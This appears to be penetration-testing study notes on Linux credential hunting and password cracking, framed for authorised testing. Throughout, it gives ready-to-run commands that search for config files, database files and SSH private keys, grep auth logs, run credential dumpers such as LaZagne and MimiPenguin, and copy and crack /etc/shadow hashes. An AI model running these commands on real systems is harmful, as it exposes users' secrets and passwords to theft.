Linux Local Password Attacks

Overview of Credential Hunting

Credential hunting is a critical phase in penetration testing and privilege escalation, involving systematic exploration of various system sources to uncover sensitive authentication information.

Key Credential Sources

1. File-based Credential Sources

• Configuration files

• Databases

• Notes and scripts

• Cronjobs

• SSH Keys

2. Historical Information Sources

• Command history

• Bash-related files

• Log files

3. Memory and Credential Storage

• System memory

• Browser credentials

• Keyrings

Systematic Credential Extraction Methodology

1. Configuration Files Reconnaissance

• Command for Scanning Configuration Files:

  Copy

  for l in $(echo ".conf .config .cnf");do 
    echo -e "\nFile extension: " $l; 
    find / -name *$l 2>/dev/null | grep -v "lib\|fonts\|share\|core"
  done

• Key Search Strategies:

  • Look for files with .conf, .config, .cnf extensions

  • Use grep to search for keywords: user, password, pass

  • Exclude unnecessary system directories

2. Database File Discovery

• Command for Database File Hunting:

  Copy

  for l in $(echo ".sql .db .*db .db*");do 
    echo -e "\nDB File extension: " $l; 
    find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share\|man"
  done

• Focus Areas:

  • SQL databases

  • .db files

  • Hidden database files

3. SSH Key Exploration

• Private Key Search:

  Copy

  grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1"

• Public Key Search:

  Copy

  grep -rnw "ssh-rsa" /home/* 2>/dev/null | grep ":1"

4. Comprehensive Log Analysis

• Log File Scanning Command:

  Copy

  for i in $(ls /var/log/* 2>/dev/null);do 
    GREP=$(grep "accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs" $i 2>/dev/null)
    if [[ $GREP ]];then 
      echo -e "\n#### Log file: " $i
      grep "accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs" $i 2>/dev/null
    fi
  done

Credential Extraction Tools

1. MimiPenguin

• Purpose: Memory credential extraction

• Usage:

  Copy

  sudo python3 mimipenguin.py
  sudo bash mimipenguin.sh

2. LaZagne

• Comprehensive Credential Extraction

• Command:

  Copy

  sudo python2.7 laZagne.py all

• Supports Extraction From:

  • WiFi

  • Browsers

  • SSH

  • Keyrings

  • Multiple other sources

3. Firefox Decrypt

• Usage:

  Copy

  python3.9 firefox_decrypt.py

Password Cracking Workflow

1. Hash Extraction

• Use unshadow to combine /etc/passwd and /etc/shadow files

  Copy

  sudo cp /etc/passwd /tmp/passwd.bak
  sudo cp /etc/shadow /tmp/shadow.bak
  unshadow /tmp/passwd.bak /tmp/shadow.bak > /tmp/unshadowed.hashes

2. Hashcat Cracking Techniques

• SHA-512 Hash Cracking:

  Copy

  hashcat -m 1800 -a 0 /tmp/unshadowed.hashes rockyou.txt -o /tmp/unshadowed.cracked

• MD5 Hash Cracking:

  Copy

  hashcat -m 500 -a 0 md5-hashes.list rockyou.txt

3. John Cracking Techniques

• SHA-512 Hash Cracking:

  Copy

  john --wordlist=rockyou.txt --format=sha512crypt /tmp/unshadowed.hashes

Critical Recommendations

• Always adapt your approach to the specific system environment

• Understand the system's purpose and network role

• Be systematic and thorough in your search

• Respect legal and ethical boundaries during penetration testing

Useful Log Locations

• /var/log/messages

• /var/log/syslog

• /var/log/auth.log

• /var/log/secure

• /var/log/faillog

Tool Links

• MimiPenguin: https://github.com/huntergregal/mimipenguin

• LaZagne: https://github.com/AlessandroZ/LaZagne

• Firefox Decrypt: https://github.com/unode/firefox_decrypt